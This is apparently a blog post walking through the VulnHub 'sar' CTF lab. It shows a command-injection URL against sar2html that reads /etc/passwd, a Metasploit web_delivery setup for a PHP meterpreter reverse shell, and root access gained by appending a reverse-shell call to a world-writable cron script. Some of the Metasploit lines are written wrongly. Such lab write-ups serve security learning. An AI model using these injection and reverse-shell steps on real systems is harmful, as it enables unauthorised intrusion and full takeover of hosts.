Another
walkthrough for the vulnhub machine "sar" which is an easy lab
designed by the author to give a taste to the OSCP Labs. The challenge is
simple just like any other CTF challenge where you identify two flags "user.txt"
and "root.txt" with the help of your pentest skill.
Download from
here: https://www.vulnhub.com/entry/sar-1,425/
Penetration
Testing Methodologies
Network Scanning
·
Netdiscover
·
Nmap
Enumeration
·
Dirb
·
Exploit DB
·
Exploit
·
Metasploit for RCE
Privilege Escalation
·
Abusing Cronjob
·
Abusing Writable file
permission
Walkthrough
Network Scanning
So, as we always
start with netdiscover to get the IP of the VM machine and the IP of
the host I've found is 192.168.29.212.
Let’s proceed with network scan using nmap aggressive
scan as given below.
nmap -p- -A 192.168.29.212
hmmm!! So here I enumerate port 80 is only
the single port open for HTTP service.
Enumeration
So I navigate to the web browser and
explore the host IP and obtain the Apache default page.
Without wasting time, I run DIRB – for
directory brute force attack for enumerating web directories and ran the
following command:
Luckily, I found robots.txt is available
which may help me to move ahead.
So I explored the url : http://192.168.29.212/robots.txt
and found an entry for “sar2html” which is a web based frontend for performance
monitoring. It converts sar binary data to graphical format and keep historical
data in its library.
I've browsed /sar2html in the web browser,
and the resulting web page displays its default configuration along with
version disclosure, which might help me find the exploit if available on the
internet.
So, I looked up for its exploit and
fortunately got an exploit link from the Exploit DB. As a result, the installed
application was vulnerable to remote code execution.
With the help of the exploit listed above,
we tried to run some arbitrary command and, as shown in the image below, we
were able to execute system commands through a web URL.
http://192.168.29.212/sar2html/index.php?plot=;
tail ‘’/etc/passwd”
So, we try to run the URL above in the web
browser to get the user account details and, as a result, we successfully get
the desired output.
Exploit
It was time to exploit this vulnerability
by spawning the host machine shell so we required to prepare a malicious php
code with the help of the Metasploit “Web Delivery” Module.
use/exploit/multi/script/web_delivery
set target 1
set lhost 192.168.29.208
set lhost 4444
set payload php/meterpreter/reverse_tcp
exploit
This will generate a malicious php code
which you’ll use for execution on the web url as done above.
So, I copied the above malicious code and
paste it inside the URL to get the back connection of the host through the url
execution.
Booom!!! We hit the goal and obtain the
meterperter session the host machine, alone this we also find the 1st
flag user.txt flag inside /home/love/Desktop.
Privilege Escalation
Now, to hunt for the final flag that would
be inside the / root directory, we need to get a high privilege shell. We
eventually searched for crontabs and found the bash script
"finally.sh" to be executed along with sudo as cronjob for after
every 5 minutes.
By peeping inside /var/www/html I found two
bash scripts “finally.sh and write.sh” moreover the write.sh has ALL permissions
to perform READ, WRITE and EXECUTE operation.
So, we read that finally.sh which is a bash
script that will execute write.sh every 5 minutes as a cronjob. Now this was
the moment when we could abuse the weak configuration of a cronjob on
finally.sh that has a link to the write.sh script that has ALL permission.
cd /var/www/html
cat finally.sh
cat write.sh
Since we can abuse write.sh file to execute
a malicious file, therefore as I use pentest-monkey: php_reverse_shell in order
to obtain a high privilege shell via netcat session.
So, I download the shell.php file inside
/var/www/html and execute following command to append a line inside the
write.sh script to run the shell.php file.
On the other hand, I start the necat
listener and then waiting for the reverse connection. Since we know that the
cronjob was scheduled to run finally.sh script at the end of 5 mint, this may help
us to get the root shell.
As a result, we got the netcat session as
root and get the root.txt script, finished the task.
0 comments:
Post a Comment